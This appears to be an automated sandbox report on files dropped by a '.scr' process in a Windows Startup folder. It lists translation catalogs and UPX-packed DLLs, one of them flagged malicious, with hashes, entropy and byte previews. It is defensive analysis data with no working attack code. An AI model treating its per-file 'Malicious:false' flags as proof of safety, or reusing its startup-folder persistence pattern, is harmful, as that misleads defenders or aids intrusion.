                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\254\345\215\227\346\245\265\346\264\262\345\234\260\345\215\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2714
                                                                                                    Entropy (8bit):5.9462307144431135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3vQA8+vGqIfdvqN5CoUvd6LC6nguQgdV7MDcbkt:rLvvO+yaCopC6nguQWMDoG
                                                                                                    MD5:0CB56C44851E6E5FF1AB468CD1DBA335
                                                                                                    SHA1:0680B79A4BEE79CFB2C106B05FF91F1A9088CE30
                                                                                                    SHA-256:EF6250A60E66C2003FE70FD89B39DB3763693061DDB026CDD08DEDAB7D217880
                                                                                                    SHA-512:77B6B471741A054A1E8B955D0B69942EBE5A589D4D0DF3A7BEF40F2304D70A1A29FCDA96810C4268E40919BCD839DC2C087802104F1302457B88750CAE249925
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........>...'...Z...............................................................................-.......:.......S.......].......s...........................................$...................#.......9.......C...'..._................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 167 messages, Project-Id-Version: iso_4217 '\351\230\277\345\257\214\346\261\227\345\260\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8815
                                                                                                    Entropy (8bit):5.590474814236245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5QDBDr5hlm/DQExKbutTN4KMJ5pjXE2SILCDYmps6Jq87KSlLL5f7xFTrxAnIbJe:aDRBm/DQExKaN6K07xLC1y87K+5n2M8
                                                                                                    MD5:995920373306F31C7AA8EA329B259412
                                                                                                    SHA1:32CCFDF2BEC45FD124F5993E918FF689D2272391
                                                                                                    SHA-256:0C532A380D8F9CFA57442733420D22A739B04C0EFDFBCD7920079ED72EFC858F
                                                                                                    SHA-512:1F8B8B00ED7B746C8808E1D0622E9B7D9F5CB6D5F2965ACA9A31B6BFAF38A650A85FC34D6A22B590E36E71ACD7C763C40C842E6DFAA3014E07C1FACA31709A13
                                                                                                    Malicious:false
                                                                                                    Preview:................T....................................... ......./.......=.......K.......].......n.......~...................................................................1.......3...'.......[.......j.......x...................................................................0...........3.......B.......Q.......a.......r.......~.......................................................................................................".......1.......6.......M.......Y.......`.......k.......{...............................................................................................................(.......-.......2.......@.......G.......L.......Q.......`.......d.......l.......r.......................................................................................................".......1.......@.......^.......q.......................................................................................................!.......*.......9.......E.......M.......R.......].......b.......o.......w.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_639-5 '\344\272\232\351\235\236\350\257\255\347\263\273'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):886
                                                                                                    Entropy (8bit):5.647816607485701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:mmYAQy1H0PXTt0Up/sCW/UKXmGz3c+W6ZWEc:xYz/CUpRW8n63qEc
                                                                                                    MD5:BAA56A6DBEE31790F261E59761EA0E1D
                                                                                                    SHA1:B6DEDFEC69CC2B9E37E2622081B740F611977993
                                                                                                    SHA-256:1DF48AB1D2591A6AFD93E1383A77D60C73CFDDB23D0DBF1D2A00715CA5EE25ED
                                                                                                    SHA-512:D54C653F0B31D1282A25DEE697CC07BF6FDDEC3C47F47F37808D3A465B91104CBFC544953DB894B35D8E604DA6BEC580FA61520A8886D12739E94CD4AA9C0EEE
                                                                                                    Malicious:false
                                                                                                    Preview:................T...............................................................(.......<...............&.......9.......R......._.......i................................................Afro-Asiatic languages.Algonquian languages.Atlantic-Congo languages.Austro-Asiatic languages.Chinese (family).Mongolian languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-12-27 13:53+0000.Last-Translator: Dingzhong Chen <wsxy162@gmail.com>.Language-Team: Chinese (Simplified) <https://hosted.weblate.org/projects/iso-codes/iso-639-5/zh_Hans/>.Language: zh_Hans.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 4.10.1.....................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\344\272\236\351\235\236\350\252\236\347\263\273'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7424
                                                                                                    Entropy (8bit):5.544579708766503
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2os9la3RSlSE0BfCuXr5VcJHVCA1qPw6cBt8b9mG6E6ubofnwIff6:4SDxWmJSE0BfNcaCjob9YkAnwIff6
                                                                                                    MD5:2B7C6599A92A9D65FC9F57312472776C
                                                                                                    SHA1:5890BD0206CE511B5B21F1651264472CACDD9182
                                                                                                    SHA-256:30098584CF9E00017D3F02E6A5F250C8231D7D1A404C4F9E12343B2911772A30
                                                                                                    SHA-512:5EA3812F6DAC76A942F9BA8CA5F620283B69B93EB1741B1A1B92A4D7E39AA357F1F66CE864D65D762DEF3E686B4FA2AD291F1F292297145B66B3A468DC093ACF
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................................+.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10644
                                                                                                    Entropy (8bit):5.746980438591726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d6+xIAG4ltU4WjV9qWxa5hW8Ge01zW3SRN/ytFOTn3G:fIAG4g4WjVDxa5hW8zizW3SRxytFOjG
                                                                                                    MD5:13417C016E0AAD594BD7C7287AD017D0
                                                                                                    SHA1:B1FF12A10E815CF8791E2CE14972DD6FA36F8A0E
                                                                                                    SHA-256:ADD4E88F132F440BF203E3F69A87CDA6E6D005EBB0F66412600E0209E71B2457
                                                                                                    SHA-512:28603873B13E1C0E9331F35DDB68CE5549658380E667B759513D385660BBE62CC1EB84822AEA5E17B0165AD486666201650A9BE455AEFD8FD3C1112EAE715CD9
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23390
                                                                                                    Entropy (8bit):5.668133804267187
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosnDNB7xW46nbjz5wsWP48WAINiZGnd1YM3KpAQdzWN:0oIDZW48fmsWP48WAItder+5
                                                                                                    MD5:4A24F8814F34B5BB13AB472C0108ACD5
                                                                                                    SHA1:77CB7CE0822E3A2EC38BCAF61DA0E5FF388917E2
                                                                                                    SHA-256:8D91C91A67EFFEB72FE92237C5680B2E61FF8A25B347FB7D78207804FC6E54ED
                                                                                                    SHA-512:F4C36FED545F38217D7E1A86490DED87756A9D0C20DF17B6049571D8AA883B20240DEB55A4518F544E421DEA2AB2C98DB119A71F440DA0B5AD59C8BEAAF53E53
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-2 '\344\272\236\351\201\224\347\264\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18208
                                                                                                    Entropy (8bit):5.335306305611884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ABUR4mdlEru6mw20dfXFopZP3CM4cfASmuSEPWtwsNjs:Py241op9acfAOSEodjs
                                                                                                    MD5:C70D1EC1F80AE1D77BA67BA75005D4B3
                                                                                                    SHA1:7A81F198692E0C21D279A4AD67221151946C33E7
                                                                                                    SHA-256:848F9C0E64A85A162BCC3571D38FEC19092ABEB8C0D501338BE3BAD2A03957D5
                                                                                                    SHA-512:40C45A505F41ECBE10EB6D54E564FE077FC99FC14D28D9CC3880AA749D17A6F3469998B2DA8839BF539FAB2A85E9982D7088BF838C24B61569642B2F8E052F78
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......5$......<$......D$......Q$......]$......i$......p$......u$......~$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%...... %......)%.......%......6%......<%......A%......H%......P%......W%......_%......i%......s%......{%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......&&.......&......=&......E&......L&......U&......`&......h&......o&......z&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'.......'......)'......2'......;'......A'......G'......\'......e'......l'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\254\345\215\227\346\245\265\346\264\262\351\240\230\345\234\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2685
                                                                                                    Entropy (8bit):5.926713760364262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf35aGs+vGqIfdvqN5CoUqqe6CTguwGL0l08rOqDokYN:rLvE+yaCo2e6CTgujL+1Dor
                                                                                                    MD5:67FB048E1971C242E4664B4CE15376F3
                                                                                                    SHA1:BA1E264C8AB51588D770A1CE5F97EA1092D6F79A
                                                                                                    SHA-256:B5CC3AA0989EFC9E31C442D977EC3AAE132EC4B7434C493C900B7DE6572A2702
                                                                                                    SHA-512:601E7DC30371713D0B8E57C4B0D152D1FC48ED0753EFBE8C0F506379461666E84E204E7DC15F828E08D79D2BDCB70593E6BA4FC4FBEE39CFFE162FB1C43BFBE4
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........0...'...L.......t.......~..............................................................."......./.......B.......L.......Y.......r...................................$...................................)...'...E.......m........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 175 messages, Project-Id-Version: iso_4217 '\344\272\236\350\241\214\345\270\263\346\210\266\345\226\256\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9664
                                                                                                    Entropy (8bit):5.6961528467597935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kUpt7w//yK0n2LC9GL2VMXo41NijnYrJLYp:kowL0nUWQijne8
                                                                                                    MD5:AFD2C344A684A1C7BF870CD577525557
                                                                                                    SHA1:2EAA731F6FF0F9A4A8740255BD26C69F4FF707BF
                                                                                                    SHA-256:971D71E7F99929B4240BFFF179B2B6BFE239E44538C81876EC784347DC6AD918
                                                                                                    SHA-512:C844BFB92C682AD09958749D071085A14281F4BB5AFC73B47DD433E114CA9FE06EF47ED1EBF2C1236DF4B78D8E8C6D3FD9670198C3B87883F1C35C37D8F57C8E
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................*.......:.......I.......N.......U.......e.......v...........................1.......3.......9.......7...Q.......................................................................................#...0...0.......a.......p......................................................................................................................./.......>.......P......._.......d.......{.......................................................................................................................&.......6.......F.......V.......[.......`.......n.......u.......z.......................................................................................................................&.......6.......I.......O.......U.......[.......j.......y.......................................................................................!.......+.......<.......J.......Z.......c.......r.......w...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 634 messages, Project-Id-Version: iso_639-3 '\344\272\236\345\270\203\345\215\241\350\226\251\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32698
                                                                                                    Entropy (8bit):5.595662432172395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7eDRtKftrFwAQa5pGufpiGO6K9Y80p4K9HOxfhfC3eJVolJF+AZc:7y6fwuxiGw+/4EuxZfCuJVo3F+Cc
                                                                                                    MD5:D00A0ADFE4D5B8301EEBB5F4F5673AC6
                                                                                                    SHA1:EEB0D4C4CCD476042BE3A28ED58057CD06B933AF
                                                                                                    SHA-256:2ABA177136ED7305C9B9B4867C8AE5A0562C92DD5C3D93F319564605C06EB4D0
                                                                                                    SHA-512:8D05B519112167AC1D50585D8459ED5A1F09CBA2BBFE253E3B614DD065F9956F9B7E57FBAB36EFB959D52073667AA36BEC33547D3C9ABA9D2358040056132661
                                                                                                    Malicious:false
                                                                                                    Preview:........z...........U....'.......5.......5.......5......$5......*5......B5......J5......O5......d5......m5......w5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6.......6.......6......&6......C6......K6......R6......j6......s6.......6.......6..#....6.......6.......6.......6.......6.......6.......6.......7.......7.......7......#7......87......@7......W7......^7......f7......m7......s7......~7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8.......8......48......=8......C8......M8......e8......l8......t8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9......39......;9......R9......h9......u9.......9.......9.......9.......9.......9.......9.......9.......:.......:......$:......1:......B:......N:......]:......j:......y:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;......+;......4;......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_3166-1 'I-Afganistani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5882
                                                                                                    Entropy (8bit):4.7288758409509875
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:3YYWu9jC1UkztmamLV4lhslTBFVeRSDpyJ+wvTYxjx+njSGN8E55Ll:oYWmjC174DG+NFViFTMjceGN31l
                                                                                                    MD5:6551801B295DE2478A774CEB2CBA1ADE
                                                                                                    SHA1:41A44A206E860992FD373B6103F448A3DC0A7E97
                                                                                                    SHA-256:31F5C6E5F04F385BC91DD8861654B148F3CC8A39AE2EC0009F6C5B351969A121
                                                                                                    SHA-512:54775B59A408E77D3FA2325380193C424F53DDE2FD93F17C593E850543436FB2F74025211DBB06D45E252E42A782BCE707FAA5FB3FDD7FFA649BABA0BCF66C44
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<...............................................................0.......:.......D.......L.......W.......b.......k.......s.......{....................................................................................................................................................... .......3.......9.......E.......W......._.......g.......p.......u.......}....................................................................................................................................................................... .......(.......0.......6.......@.......K.......V.......].......b.......h.......s.......}...............................................................................................................................................................3.......;.......B.......K.......V.......l.......t.......{.......................................................................................................................................!.......).......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):415
                                                                                                    Entropy (8bit):5.207243815986905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijoYYxA9Ct0vOuvP0NXzffs57/RWOFPJt3buK72AFFKuK7BK9XmBQ8KMW0YEi9:i4oxxjt02Uky/XyeFvvXmBQWi9
                                                                                                    MD5:AD64A5CAEA702CF125FAC1C8F319C799
                                                                                                    SHA1:7E8D0762F15F9516BC9423FEF575FD5D5DB015AF
                                                                                                    SHA-256:53CB30ACD0D05E80B92F6FAE8D975C3BAF2F78F14A4FA5A7EC74079F70666AAE
                                                                                                    SHA-512:636C444466EC106D5996DB8489B1F0F1DE24478FED4CD0E73274BBA26CECE3DF6385C1B36EF46F6189E5C69C60772DA6BB1C97C636FB159774A32BD9B99A5D5F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...e...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 18:50+0000.Last-Translator: Thobile Mhlongo <thobile@translate.org.za>.Language-Team: Zulu <zulu@translate.org.za>.Language: zu.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 50 messages, Project-Id-Version: iso_639-3 'Isibhunu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2596
                                                                                                    Entropy (8bit):4.777036996518915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:z0giIttnOutk71mo/s5AotxziMUZq+fBivVAl065FnhhQz:Qv2nzy71mokhBiMX+ZeVAl0cn3Qz
                                                                                                    MD5:3FA739A13AA12B27E0E61F2A270F22DA
                                                                                                    SHA1:AD7E464F1197653480F052A21DAE8927735532E3
                                                                                                    SHA-256:43812144292CF014E10DFECACCB6CCC7BF3C2FF26C2DF52627C6458A6C85FC51
                                                                                                    SHA-512:2F877BFE890CEAF6AA397859F91463F01FC7F5C640E1C38F4F2428092E9B6A8A16838A38807D0EBFFB7F093A207FF0223D43E797FC40BEE6F11D0BBDCB081FE5
                                                                                                    Malicious:false
                                                                                                    Preview:........2...........C...<.......H.......I.......S.......Z.......f.......m.......t.......~.......................................................................................................................................................................'.......2.......=.......B.......J.......P.......W.......b.......k.......s.......{.......................................................................................................................................................................................&.......2.......>.......L.......[.......g.......t.......................................................................................................(...............>.......I.......V.......e.......t...............................................................................................................%.......-...........&...#.........../...)...*................................... ...............1...,...........!...(...........................'.......................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):90904
                                                                                                    Entropy (8bit):7.912986999965876
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:7uxWsjtpMPh6gRBwXVEX1iIgZId3QMloC56qpdasxz/Ceyydxq/6PERvD7hagxt+:7uxFch6gRBku1iIgZkQxgpda+nybjvDO
                                                                                                    MD5:CFCB1A1159CC2AADBA3C62AC44DC2363
                                                                                                    SHA1:E19DF1A6C3DFA545C6B2C20355B24584933D7F9F
                                                                                                    SHA-256:279AAC95D765000D7B3B09B75E66A311A03833A0E28361683CF41161F37E3331
                                                                                                    SHA-512:F7F42BC3EB6A2DB706F784E2B772C3CE5D0F87B4B3FF6BDA6D2F934AECCE0174D52623AAD0A082DD1EFC0F70C990A07FA9768AC96D42DDB52EA5BE594198B447
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(.0...........3... ...................................`............`..........................................\..P....Y.......P.......................\.......................................?..@...........................................UPX0....................................UPX1.....0... ..."..................@....rsrc........P.......&..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68376
                                                                                                    Entropy (8bit):6.148788033723542
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/D:BDmF61JFn+/O/BI1L057Sy+xF
                                                                                                    MD5:8DBE9BBF7118F4862E02CD2AAF43F1AB
                                                                                                    SHA1:935BC8C5CEA4502D0FACF0C49C5F2B9C138608ED
                                                                                                    SHA-256:29F173E0147390A99F541BA0C0231FDD7DFBCA84D0E2E561EF352BF1EC72F5DB
                                                                                                    SHA-512:938F8387DCC356012AC4A952D371664700B110F7111FCC24F5DF7D79791AE95BAD0DBAF77D2D6C86C820BFD48A6BDBE8858B7E7AE1A77DF88E596556C7135ED4
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.................PE..d......f.........." ...(..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1809176
                                                                                                    Entropy (8bit):7.993595854895826
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:49152:8f2ZN5YIMku2u+Nh2bgCuBa2PB3lF3gKqKPZGL:8uZfW2u+N81YDPB3nXy
                                                                                                    MD5:CA67F0BAF3CC3B7DBB545CDA57BA3D81
                                                                                                    SHA1:5B4E36AEF877307AF8A8F78F3054D068D1A9CE89
                                                                                                    SHA-256:F804ED205E82003DA6021EE6D2270733CA00992816E7E89BA13617C96DD0FBA3
                                                                                                    SHA-512:A9F07DD02714C3EFBA436326425D443969018ACE7EBD7CC33C39D43E3D45480A4FCD4C46C09AD132B4F273888F13E9F598DE257130429FCB2519C000E4FAB6F7
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..........P..[k...P..................................Pl...........`.........................................H.k.d....yk......pk......._.`I...........Ll. ............................gk.(....gk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63488
                                                                                                    Entropy (8bit):7.601310676926509
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:K1RcFc7nkElGy0R4+upsSnBXShX7E8L4c6Hq8mq:K1uiQys4lmSnBXGoI4c6tm
                                                                                                    MD5:25338D0FBA289911448077184A4CD441
                                                                                                    SHA1:EF117230297F577F30DEC80BD3D4C69B8B50EF11
                                                                                                    SHA-256:CFB10E77FEB912248D303E6C2E69411A97B2E85D59C669E9627EB240E22F900F
                                                                                                    SHA-512:2F054A4F3F2EF1B805392B4FD7249C931478B8EA4BDF64487FF8AE5C5BBA884A5E6F08A919DEAFD6D1F2DA351A26E963FAD968B2CC4148FDEAEF1305E73A3B53
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.I+.z'x.z'x.z'x...x.z'xW.&y.z'xc..x.z'xW."y.z'xW.#y.z'xW.$y.z'xN.#y.z'xM.&y.z'xN.&y.z'x.z&x.z'x...y.z'x..'y.z'x..%y.z'xRich.z'x................PE..d......g.........." .........P............................................................`.........................................p...lB..p...........p.... ..........................................................8...........................................UPX0....................................UPX1................................@....rsrc....P.......J..................@..............................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26392
                                                                                                    Entropy (8bit):7.471188690929299
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1GXeQMA/KHhhtpoDeI1QGcq5YiSyvXAMxkEm:1BA/KHhhwDeI1QGco7Syfxq
                                                                                                    MD5:6C123B56F3A37C129EFF6FC816868B25
                                                                                                    SHA1:AC6B6E3BDC53870BA044A38B9AE9A067B70E7641
                                                                                                    SHA-256:99687F9B1648AC684DFB7937C75E3E50DC16704ABD4C4C19601C40EC6971C5EE
                                                                                                    SHA-512:B840871278A6CC32D5AB0CC6D9C129DA0BA2D08B93C3C6C000E3989FE1AB8B09ED82CA547A1057690F52F22E44B203F424E2CCD9655BE82A1094547A94DDC3C2
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.0..........0.....................................................`......................................... ...L....................`..............l.......................................@...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
